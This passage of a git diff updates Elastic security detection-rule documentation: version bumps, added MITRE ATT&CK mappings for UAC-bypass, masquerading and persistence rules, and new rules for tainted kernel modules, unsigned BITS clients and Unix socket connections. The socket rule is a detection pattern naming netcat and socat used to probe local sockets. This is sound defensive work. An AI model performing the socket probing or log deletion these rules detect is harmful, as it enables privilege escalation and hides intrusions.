) and not process.parent.name in ("dracut-install", "apticron", "generate-from-dir", "platform-python")] [file where host.os.type == "linux" and event.action == "creation" and file.path : ( "/dev/shm/*", "/run/shm/*", "/tmp/*", "/var/tmp/*", "/run/*", "/var/run/*", "/var/www/*", "/proc/*/fd/*" )] 
@@ -83,3 +83,11 @@ sequence by host.id, process.entity_id with maxspan=1s ** Name: Hide Artifacts ** ID: T1564 ** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Rename System Utilities +** ID: T1036.003 +** Reference URL: https://attack.mitre.org/techniques/T1036/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/system-log-file-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/system-log-file-deletion.asciidoc index b06ba5ee6e..bb881b49f4 100644 --- a/docs/detections/prebuilt-rules/rule-details/system-log-file-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/system-log-file-deletion.asciidoc @@ -34,7 +34,7 @@ Identifies the deletion of sensitive Linux system logs. This may indicate an att * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
@@ -43,47 +43,6 @@ Identifies the deletion of sensitive Linux system logs. This may indicate an att *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. 
-- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query 
@@ -104,7 +63,7 @@ file where host.os.type == "linux" and event.type == "deletion" and "/var/log/boot.log", "/var/log/kern.log" ) and - not process.name : ("gzip") + not process.name in ("gzip", "executor", "dockerd") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/system-shells-via-services.asciidoc b/docs/detections/prebuilt-rules/rule-details/system-shells-via-services.asciidoc index 5e14d76abc..b70123c89d 100644 --- a/docs/detections/prebuilt-rules/rule-details/system-shells-via-services.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/system-shells-via-services.asciidoc @@ -30,11 +30,12 @@ Windows services typically run as SYSTEM and can be used as a privilege escalati * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -118,3 +119,19 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ +* Sub-technique: +** Name: Windows Command Shell +** ID: T1059.003 +** Reference URL: https://attack.mitre.org/techniques/T1059/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/tainted-kernel-module-load.asciidoc b/docs/detections/prebuilt-rules/rule-details/tainted-kernel-module-load.asciidoc new file mode 100644 index 0000000000..7b8fea7c10 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/tainted-kernel-module-load.asciidoc 
@@ -0,0 +1,63 @@ +[[tainted-kernel-module-load]] +=== Tainted Kernel Module Load + +This rule monitors the syslog log file for messages related to instances of a tainted kernel module load. Rootkits often leverage kernel modules as their main defense evasion technique. Detecting tainted kernel module loads is crucial for ensuring system security and integrity, as malicious or unauthorized modules can compromise the kernel and lead to system vulnerabilities or unauthorized access. + +*Rule type*: query + +*Rule indices*: + +* logs-system.auth-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and +message:"module verification failed: signature and/or required key missing - tainting kernel" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Kernel Modules and Extensions +** ID: T1547.006 +** Reference URL: https://attack.mitre.org/techniques/T1547/006/ diff --git a/docs/detections/prebuilt-rules/rule-details/temporarily-scheduled-task-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/temporarily-scheduled-task-creation.asciidoc index 1d69f2c623..39c08b7f89 100644 
--- a/docs/detections/prebuilt-rules/rule-details/temporarily-scheduled-task-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/temporarily-scheduled-task-creation.asciidoc @@ -31,8 +31,9 @@ Indicates the creation and deletion of a scheduled task within a short time inte * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -66,3 +67,15 @@ sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/third-party-backup-files-deleted-via-unexpected-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/third-party-backup-files-deleted-via-unexpected-process.asciidoc index c8ef2af049..9ae157c796 100644 --- a/docs/detections/prebuilt-rules/rule-details/third-party-backup-files-deleted-via-unexpected-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/third-party-backup-files-deleted-via-unexpected-process.asciidoc @@ -36,7 +36,7 @@ Identifies the deletion of backup files, saved using third-party software, by a * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -125,3 +125,7 @@ file where host.os.type == "windows" and event.type == "deletion" and ** Name: Inhibit System Recovery ** ID: T1490 ** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc index 9cd9d36164..f7503c48cb 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc @@ -32,10 +32,12 @@ Identifies User Account Control (UAC) bypass attempts by abusing an elevated COM * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -80,3 +82,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc index b010674789..8a320919bd 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc @@ -33,10 +33,11 @@ Identifies attempts to bypass User Account Control (UAC) via DLL side-loading. A * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -80,3 +81,23 @@ file where host.os.type == "windows" and event.type : "change" and process.name ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-windows-directory-masquerading.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-windows-directory-masquerading.asciidoc index f0b2f566ea..5ae7d6f8ce 100644 
--- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-windows-directory-masquerading.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-via-windows-directory-masquerading.asciidoc @@ -32,11 +32,12 @@ Identifies an attempt to bypass User Account Control (UAC) by masquerading as a * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -128,3 +129,23 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc index 9474fb17ee..9eeefa5498 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc 
@@ -32,10 +32,12 @@ Identifies attempts to bypass User Account Control (UAC) by abusing an elevated * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -78,3 +80,27 @@ process where host.os.type == "windows" and event.type == "start" and process.na ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc index 2fdac63213..62673e813a 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc 
@@ -30,10 +30,12 @@ Identifies User Account Control (UAC) bypass via hijacking DiskCleanup Scheduled * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -77,3 +79,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-icmluautil-elevated-com-interface.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-icmluautil-elevated-com-interface.asciidoc index da200ace1d..e000b5ac4a 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-icmluautil-elevated-com-interface.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-icmluautil-elevated-com-interface.asciidoc 
@@ -30,10 +30,12 @@ Identifies User Account Control (UAC) bypass attempts via the ICMLuaUtil Elevate * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -76,3 +78,27 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ +* Sub-technique: +** Name: Component Object Model +** ID: T1559.001 +** Reference URL: https://attack.mitre.org/techniques/T1559/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc index a13326f6d8..645b66a8bf 100644 --- a/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc 
@@ -32,11 +32,12 @@ Identifies attempts to bypass User Account Control (UAC) by hijacking the Micros * OS: Windows * Use Case: Threat Detection * Tactic: Privilege Escalation +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -131,3 +132,23 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Bypass User Account Control ** ID: T1548.002 ** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Bypass User Account Control +** ID: T1548.002 +** Reference URL: https://attack.mitre.org/techniques/T1548/002/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: MMC +** ID: T1218.014 +** Reference URL: https://attack.mitre.org/techniques/T1218/014/ diff --git a/docs/detections/prebuilt-rules/rule-details/unauthorized-access-to-an-okta-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/unauthorized-access-to-an-okta-application.asciidoc index 5ed7b6e896..cac33af7ed 100644 --- a/docs/detections/prebuilt-rules/rule-details/unauthorized-access-to-an-okta-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unauthorized-access-to-an-okta-application.asciidoc @@ -32,7 +32,7 @@ Identifies unauthorized access attempts to Okta applications. * Use Case: Identity and Access Audit * Data Source: Okta -*Version*: 105 +*Version*: 206 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/unix-socket-connection.asciidoc b/docs/detections/prebuilt-rules/rule-details/unix-socket-connection.asciidoc new file mode 100644 index 0000000000..ece5650e18 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unix-socket-connection.asciidoc 
@@ -0,0 +1,65 @@ +[[unix-socket-connection]] +=== Unix Socket Connection + +This rule monitors for inter-process communication via Unix sockets. Adversaries may attempt to communicate with local Unix sockets to enumerate application details, find vulnerabilities/configuration mistakes and potentially escalate privileges or set up malicious communication channels via Unix sockets for inter-process communication to attempt to evade detection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend +* Rule Type: BBR + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and ( + (process.name in ("nc", "ncat", "netcat", "nc.openbsd") and + process.args == "-U" and process.args : ("/usr/local/*", "/run/*", "/var/run/*")) or + (process.name == "socat" and + process.args == "-" and process.args : ("UNIX-CLIENT:/usr/local/*", "UNIX-CLIENT:/run/*", "UNIX-CLIENT:/var/run/*")) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Inter-Process Communication +** ID: T1559 +** Reference URL: https://attack.mitre.org/techniques/T1559/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/unsigned-bits-service-client-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/unsigned-bits-service-client-process.asciidoc new file mode 100644 index 0000000000..ba69088f40 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/unsigned-bits-service-client-process.asciidoc 
@@ -0,0 +1,72 @@ +[[unsigned-bits-service-client-process]] +=== Unsigned BITS Service Client Process + +Identifies an unsigned Windows Background Intelligent Transfer Service (BITS) client process. Attackers may abuse BITS functionality to download or upload data using the BITS service. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://web.archive.org/web/20230531215706/https://blog.menasec.net/2021/05/hunting-for-suspicious-usage-of.html +* https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-2 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +library where dll.name : "Bitsproxy.dll" and process.executable != null and +not process.code_signature.trusted == true + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: BITS Jobs +** ID: T1197 +** Reference URL: https://attack.mitre.org/techniques/T1197/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-a-trusted-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-a-trusted-process.asciidoc index 1e99558510..99a809c818 100644 --- a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-a-trusted-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-a-trusted-process.asciidoc @@ -30,7 +30,7 @@ Identifies digitally signed (trusted) processes loading unsigned DLLs. Attackers * Rule Type: BBR * Data Source: Elastic Defend -*Version*: 1 +*Version*: 101 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-svchost.asciidoc b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-svchost.asciidoc index ddb92596a1..6985df5791 100644 --- a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-svchost.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-loaded-by-svchost.asciidoc @@ -27,9 +27,11 @@ Identifies an unsigned library created in the last 5 minutes and subsequently lo * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: 
@@ -151,3 +153,27 @@ library where host.os.type == "windows" and ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: System Services +** ID: T1569 +** Reference URL: https://attack.mitre.org/techniques/T1569/ +* Sub-technique: +** Name: Service Execution +** ID: T1569.002 +** Reference URL: https://attack.mitre.org/techniques/T1569/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc index e3c4f2aabf..d9d6cb793e 100644 --- a/docs/detections/prebuilt-rules/rule-details/unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc @@ -29,7 +29,7 @@ Identifies a Windows trusted program running from locations often abused by adve * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: 
@@ -144,6 +144,14 @@ library where host.os.type == "windows" and ** ID: TA0005 ** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Technique: ** Name: Hijack Execution Flow ** ID: T1574 ** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/rule-details/untrusted-driver-loaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/untrusted-driver-loaded.asciidoc index 1853a0b28b..6eaa986b59 100644 --- a/docs/detections/prebuilt-rules/rule-details/untrusted-driver-loaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/untrusted-driver-loaded.asciidoc @@ -33,7 +33,7 @@ Identifies attempt to load an untrusted driver. Adversaries may modify code sign * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -126,10 +126,10 @@ driver where host.os.type == "windows" and process.pid == 4 and ** ID: TA0005 ** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Subvert Trust Controls -** ID: T1553 -** Reference URL: https://attack.mitre.org/techniques/T1553/ +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ * Sub-technique: -** Name: Code Signing Policy Modification -** ID: T1553.006 -** Reference URL: https://attack.mitre.org/techniques/T1553/006/ +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/unusual-aws-command-for-a-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/unusual-aws-command-for-a-user.asciidoc index 